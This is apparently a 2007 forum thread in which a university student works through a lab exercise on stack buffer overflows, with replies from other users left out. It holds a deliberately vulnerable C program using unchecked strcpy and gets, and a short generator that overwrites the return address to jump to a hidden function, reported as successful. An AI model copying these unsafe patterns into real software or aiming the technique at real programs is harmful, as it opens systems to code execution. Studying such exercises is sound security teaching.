Easy memory address question

FirebarUK · 14 Mar 2007 at 21:11

Hi all,

I'm studying exploits at University and buffer overflows with unsafe functions. Am I correct in saying that from the memory address 0x0804857e to 0x08048599 is 27 bytes?
If I'm wrong, could someone please take the time to explain this to me. I don't do computer science and am failing to see the logic in this?

Thanks

FirebarUK · 14 Mar 2007 at 21:34

Thank you, thats how I came to it aswell.

FirebarUK · 14 Mar 2007 at 21:39

A Computer Network Management one which involves a network security module. This means we study things like IP traceback etc and software vulnerabilities such as buffer overflow etc.

FirebarUK · 14 Mar 2007 at 23:50

Sure, the network stuff is. Anything to do with programming though is certainly not my forte

FirebarUK · 15 Mar 2007 at 01:19

Thanks for your input. Not being particularly knowledgeable to start with, I'd say this is certainly pointer arithmetic. As far as I understand I'm trying to comprimise some simple sample code to cause a buffer overflow and insert a pointer address so that it immediately runs another function in the code, i.e;

vulnerable code

Code:

void secretArea (void)
{
puts("Congratulation you have access!");
system("xterm");
}

int checkName(int argc, char **argv)
{
char Ubuffer [10];
if (argc>1)
  strcpy(Ubuffer,argv[1]);
if (!strcmp(Ubuffer,"Ted"))  
  {
  printf("Hello Ted");
  return 1;
  }
printf("Wrong Name\n");
return 0;
}

int main (int argc, char **argv)
{
char Pbuffer [20];
if (!checkName(argc,argv)) 
  return 0;
printf("\nPlease enter password: ");
gets(Pbuffer);
if (!strcmp(Pbuffer,"password"))
  {
  secretArea();
  }
return 0;
}

exploit code;

Code:

#include <stdio.h>
#include <stdlib.h>

int main (void)
{
char address[0];
int i = 0;
for (i=0;i<=sizeof(address);i+=4)
  {
  *(long*)&address[i]=0x0;
  }
puts(address);
}

I've used gdb to disassemble the main function in the vulnerable code so I can see what the address for the secretArea function is (this is what I want to run after overflow in checkName). The problem I'm having is getting the right size of address array in bytes, reflecting the start of the array to the return address, something which confuses me a little. Essentially so the correct memory value is in the register when executed.

I could be talking complete crap here

I think this stuff is covered in the famous phrack paper, "Stack Smashing for Fun and Profit" or something, but that also makes my head hurt

FirebarUK · 15 Mar 2007 at 09:12

Thanks guys, that certainly helps.

I'll have a gander at some other tutorials.

FirebarUK · 15 Mar 2007 at 17:10

Thanks, I can certainly see what your doing there. I have something similar;

28 bytes in total to overwrite the EIP with the memory address of the function you want to go to.. (is this the right way to think about it?)

Code:

#include <stdio.h>
#include <stdlib.h>

int main (void)
{
char address[28];
int i = 0;
for (i=0;i<=sizeof(address);i+=4)
  {
  *(long*)&address[i]=0x8048470;
  }
puts(address);
}

And that cracked it. So above the array allocation in the stack, this means I need 28-12 = 16 bytes, so most likely 4 x 4bytes . So what are the registers above the stack, and how can I see them in gdb? I presume in your example, esb is a register, but I dont see any eip when disassembling?

Also, im trying to overflow the checkName buffer of [10], that is infact [12] due to having to be a multiple of 4. Is that an architectural thing? or just simply because it uses hex.

Thanks for taking the time

FirebarUK · 15 Mar 2007 at 17:31

Ok thanks. So I'm trying to overflow past the ESP etc to the EIP.

FirebarUK · 16 Mar 2007 at 00:23

Its become a lot clearer now and I can see quite clear what I'm trying to do. Thanks again for your help, I'm going to watch that video now